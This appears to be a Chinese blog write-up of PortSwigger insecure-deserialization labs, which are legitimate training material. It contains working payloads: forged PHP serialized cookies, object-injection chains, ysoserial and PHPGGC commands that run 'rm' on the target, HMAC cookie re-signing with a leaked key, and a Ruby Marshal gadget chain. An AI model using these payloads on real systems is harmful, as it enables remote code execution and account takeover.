PortSwigger 基于不安全的反序列化漏洞

news2024/11/25 18:49:53

一、反序列化漏洞简单介绍

        反序列化漏洞是指攻击者通过在应用程序中注入恶意的序列化对象来利用应用程序的反序列化功能,从而导致应用程序受到攻击的漏洞。

        在一些编程语言和应用程序中,对象可以被序列化为一些字节流或字符串,然后在不同的应用程序之间传输。当这些对象被接收时,它们需要进行反序列化以恢复原始对象。攻击者可以利用这种反序列化过程来注入恶意的代码和数据,从而导致应用程序执行恶意操作,例如远程命令执行、文件读写、数据库操作等。

        反序列化漏洞通常出现在使用序列化/反序列化来实现持久性、远程过程调用 (RPC) 或消息传递等功能的应用程序中。

二、反序列化漏洞的利用方式

        1、修改序列化对象

                (1)通过Burp Suite Scanner 发现cookie处存在漏洞

                (2)通过url解码获得base64编码

                 (3)通过base64解码获得序列化对象

                 (4) 构架经过base64-url编码的carlos cookie

               wiener解码后的cookie   :    

                        O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}

               经过构架的carloscookie :

                        O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:1;}

        base64-url编码的carlos cookie:                

                        Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6ImNhcmxvcyI7czo1OiJhZG1pbiI7YjoxO30%3D

        2、修改序列化数据类型

                利用原理:PHP 将根据初始数字有效地将整个字符串转换为整数值,例如:

                5 == "5 of something"  等于 5 == 5
                0 == "Example string"  等于 0 == 0        

                利用过程:修改序列化对象

        O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

        3、 使用应用程序功能利用不安全的反序列化

                原理:在删除用户时发生越权,可以删除其他用户下的文件。

O:4:"User":3:s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"sxxmaz8mlqg8aod8ogehb71i6b6unko4";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}

        4、PHP 中的任意对象注入

                原理:PHP源码中存在可利用的魔法方法,反序列化时会检查该类里是否包含魔术方法,存在会首先调用该方法,本实验代码如下:

<?php

class CustomTemplate {
    private $template_file_path;
    private $lock_file_path;

    public function __construct($template_file_path) {
        $this->template_file_path = $template_file_path;
        $this->lock_file_path = $template_file_path . ".lock";
    }

    private function isTemplateLocked() {
        return file_exists($this->lock_file_path);
    }

    public function getTemplate() {
        return file_get_contents($this->template_file_path);
    }

    public function saveTemplate($template) {
        if (!isTemplateLocked()) {
            if (file_put_contents($this->lock_file_path, "") === false) {
                throw new Exception("Could not write to " . $this->lock_file_path);
            }
            if (file_put_contents($this->template_file_path, $template) === false) {
                throw new Exception("Could not write to " . $this->template_file_path);
            }
        }
    }

    function __destruct() {
        // Carlos thought this would be a good idea
        if (file_exists($this->lock_file_path)) {
            unlink($this->lock_file_path);
        }
    }
}

?>

注意:

        protected   属性被序列化的时候属性值会变成 %00*%00属性名;
        private       属性被序列化的时候属性值会变成 %00类名%00属性名;

     (%00为空白符,空字符也有长度,一个空字符长度为 1)。

//PHP常见的魔术方法

__construct() 当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。

__destruct() 当一个对象销毁(反序列化)时被调用

__toString() 当一个对象被当作一个字符串使用时被调用

__sleep() 在对象在被序列化之前立即运行

__wakeup() 将在序列化之后立即被调用

        开始构造系列化代码:

        O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}

        5、使用 Apache Commons 利用 Java 反序列化

        原理:Apache Commons Collections 存在反序列化任意命令执行漏洞。

        ysoserial是一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。

        项目地址:https://github.com/frohoff/ysoserial

        

java -jar path/to/ysoserial.jar CommonsCollections4 "rm /home/carlos/morale.txt" > 1.txt

certutil -f -encode 1.txt 2.txt

        6、使用预构建的小工具链利用 PHP 反序列化

                1、查看cookie发现存在经过base64编码的反序列化对象,并且使用hmac_sha1进行了校验,尝试修改系列化对象发现报错信息中包含Symfony 4.3.6框架。

 session=%7B%22token%22%3A%22Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJsM3I4aXRpNnN2ZTUyenNta3hhM2U1MjJnYmcxc3V4YyI7fQ%3D%3D%22%2C%22sig_hmac_sha1%22%3A%222d81e9388a0c0ef70ddbafbd86902f67823f3b7a%22%7D

                2、通过目录遍历发现存在/cgi-bin/phpinfo.php,查看phpinfo信息找到SECRET_KEY=     v90b1p0gsd9o49y5xxjlrwhg9ihc00ma 

                3、使用“PHPGGC”工具对Symfony 4进行构造,并进行base54。

        ./phpggc Symfony/RCE4 exec "rm /home/carlos/morale.txt" -b

                4、编写代码,重新构造cookie。

# 2.php
<?php
$object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319";
$secretKey = "v90b1p0gsd9o49y5xxjlrwhg9ihc00ma";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;
# 运行结果
C:\Users\>php 2.php
%7B%22token%22%3A%22Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319%22%2C%22sig_hmac_sha1%22%3A%22a1e876a95939a139df0f176ce58a50a0ad49c084%22%7D

         7、使用记录的小工具链利用 Ruby 反序列化

# Autoload the required classes
Gem::SpecFetcher
Gem::Installer

# prevent the payload from running when we Marshal.dump it
module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end

wa1 = Net::WriteAdapter.new(Kernel, :system)

rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "rm /home/carlos/morale.txt")

wa2 = Net::WriteAdapter.new(rs, :resolve)

i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")


n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)

t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)

r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)

payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/596224.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基于Java+SpringBoot+Vue前后端分离网课在线学习观看系统

博主介绍&#xff1a;✌全网粉丝20W,csdn特邀作者、博客专家、CSDN新星计划导师、java领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精彩专…

C#正则表达式的使用

C#正则表达式 System.Text.RegularExpressions.Regex 使用时需要引入命名空间 using System.Text.RegularExpressions; 如果不引用则写成 System.Text.RegularExpressions.Regex 使用方法如下&#xff1a; string str"测试123456"; string result""; re…

chatgpt赋能python:Python代码中的符号

Python代码中的符号 Python是一种简单易学的编程语言&#xff0c;拥有着广泛的应用领域&#xff0c;比如数据分析、人工智能、Web开发等等。在Python的编程过程中&#xff0c;符号是我们必须要熟悉的一部分。在本文中&#xff0c;我们将介绍Python代码中常见的符号&#xff0c…

华为OD机试真题B卷 Java 实现【人民币转换】,附详细解题思路

一、题目描述 考试题目和要点&#xff1a; 中文大写金额数字前应标明“人民币”字样。中文大写金额数字应用壹、贰、叁、肆、伍、陆、柒、捌、玖、拾、佰、仟、万、亿、元、角、分、零、整等字样填写。中文大写金额数字到“元”为止的&#xff0c;在“元”之后&#xff0c;应…

【Python PyInstaller】零基础也能轻松掌握的学习路线与参考资料

一、Python PyInstaller介绍 Python PyInstaller是一个用于将Python应用程序打包成可执行文件的工具&#xff0c;支持Windows、Mac OS X和Linux平台。使用PyInstaller可以方便地将Python应用程序和所需的依赖项&#xff08;包括Python解释器本身&#xff09;打包成一个独立的可…

JS的DOM对象获取元素

测试1 getElementById <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta http-equiv"X-UA-Compatible" content"IEedge"><meta name"viewport" content"widthdev…

I.MX RT1170:如何在SRAM/SDRAM运行程序

一般Flash为non-XIP时&#xff0c;我们需要在RAM上运行程序。还有一种情况&#xff0c;就是我们不想每次调试都要将程序写入Flash&#xff0c;然后由BootROM进行代码的拷贝和跳转&#xff0c;这样可以减少Flash的烧写次数。本篇文章就来讨论一下如何实现这两种情形的RAM代码运行…

chatgpt赋能python:如何更好地理解Python代码

如何更好地理解Python代码 引言 Python是一种高级编程语言&#xff0c;它越来越受欢迎。由于Python内置的强大功能和易学性&#xff0c;许多开发者选择使用Python来开发应用程序。但是&#xff0c;有时候我们可能会面临一些难以理解的代码&#xff0c;尤其是在阅读其他人的代…

一天吃透Spring面试八股文

内容摘自我的学习网站&#xff1a;topjavaer.cn Spring是一个轻量级的开源开发框架&#xff0c;主要用于管理 Java 应用程序中的组件和对象&#xff0c;并提供各种服务&#xff0c;如事务管理、安全控制、面向切面编程和远程访问等。它是一个综合性框架&#xff0c;可应用于所有…

解决Wsl2中Ubuntu无法更新软件的问题

本文排版不太好&#xff0c;详情可见笔记 有道云笔记 安装wsl2之后&#xff0c;在Ubuntu中更新软件&#xff0c;执行apt-get update命令报错&#xff0c;如下 rootjiangcheng01:~# sudo apt-get update Ign:1 http://mirrors.aliyun.com/ubuntu groovy InRelease Ign:2 http:…

一个注解的事儿,数据脱敏解决了

目录 什么是数据脱敏开整使用 Hutool 工具类实现数据掩码Hutool 信息脱敏工具类使用 Jackson 进行数据序列化脱敏 注解实现数据脱敏1、定义一个注解2、创建一个枚举类3、创建我们的自定义序列化类4、测试 项目 pom 文件 总结 本文主要分享什么是数据脱敏&#xff0c;如何优雅的…

chatgpt赋能python:Python从接口获取数据的重要性

Python从接口获取数据的重要性 在当今信息技术高速发展的时代&#xff0c;获取和分析数据是商业成功的关键因素之一。而在获取数据方面&#xff0c;使用Python编写接口来获取数据、自动化处理和分析数据的方法不仅更加高效&#xff0c;而且还可以把重点放在分析数据本身上&…

Element UI el-table form 表单的封装思路

Element UI el-table form 表单的封装思路 思路一: 将所有 form 表单类型都在 el-column-item 组件中定义好,然后根据传入的属性控制展示哪一个 form 表单类型 部分代码如下: <template><div><el-row style"padding: 0 20px"><el-col :span&…

2023年湖北七大员是哪七大员?七大员考试报名网站是哪里?启程别

2023年湖北七大员是哪七大员&#xff1f;七大员考试报名网站是哪里&#xff1f;启程别 住建厅七大员分类&#xff1a; 施工员&#xff08;土建&#xff0c;装饰装修&#xff0c;设备安装&#xff0c;市政工程&#xff09; 质量员&#xff08;土建&#xff0c;装饰装修&#x…

「从零入门推荐系统」20:推荐系统的未来发展

作者 | gongyouliu 编辑 | gongyouliu 随着科学技术的进步&#xff0c;信息技术、网络技术及物联网的快速发展&#xff0c;新信息的生产与传播更加便捷、快速。特别是最近大火的chatGPT、大模型技术引领的新一轮科技革命&#xff0c;让每一个人都可以轻松地生产各种各样的内容&…

ThreeJS教程:精灵模型Sprite作为标签

推荐&#xff1a;将 NSDT场景编辑器 加入你的3D工具链 3D工具集&#xff1a; NSDT简石数字孪生 精灵模型Sprite作为标签 实际开发的时候&#xff0c;可以使用精灵模型Sprite 颜色贴图作为标签&#xff0c;标注三维场景。 下面具体知识点&#xff0c;在精灵模型章节基本都讲解…

【多线程】阻塞队列

1. 认识阻塞队列和消息队列 阻塞队列也是一个队列&#xff0c;也是一个特殊的队列&#xff0c;也遵守先进先出的原则&#xff0c;但是带有特殊的功能。 如果阻塞队列为空&#xff0c;执行出队列操作&#xff0c;就会阻塞等待&#xff0c;阻塞到另一个线程往阻塞队列中添加元素(…

I.MX RT1170启动详解:Boot配置、Bootable image头的组成

文章目录 1 基础知识2 BOOT配置2.1 BOOT_CFG配置2.2 BOOT_MODE 3 Bootable image3.1 文件格式3.2 Bootable image头的组成3.3 Bootable image的生成3.4 例&#xff1a;BootROM之non-XIP加载过程3.5 例&#xff1a;bin文件分析 1 基础知识 &#xff08;1&#xff09;BootROM Bo…

遥感云大数据在灾害、水体与湿地领域典型案例及GPT模型教程

详情点击链接&#xff1a;遥感云大数据在灾害、水体与湿地领域典型案例及GPT模型教程 一&#xff1a;平台及基础开发平台 GEE平台及典型应用案例&#xff1b; GEE开发环境及常用数据资源&#xff1b; ChatGPT、文心一言等GPT模型 JavaScript基础&#xff1b; GEE遥感云重…

什么是homography变换

就是33的可逆矩阵对齐次坐标的变换。也叫射影变换&#xff0c;直射变换。 projectivity projective transformation collineation homography 这几个词在描述齐次坐标下的变换时是同义的。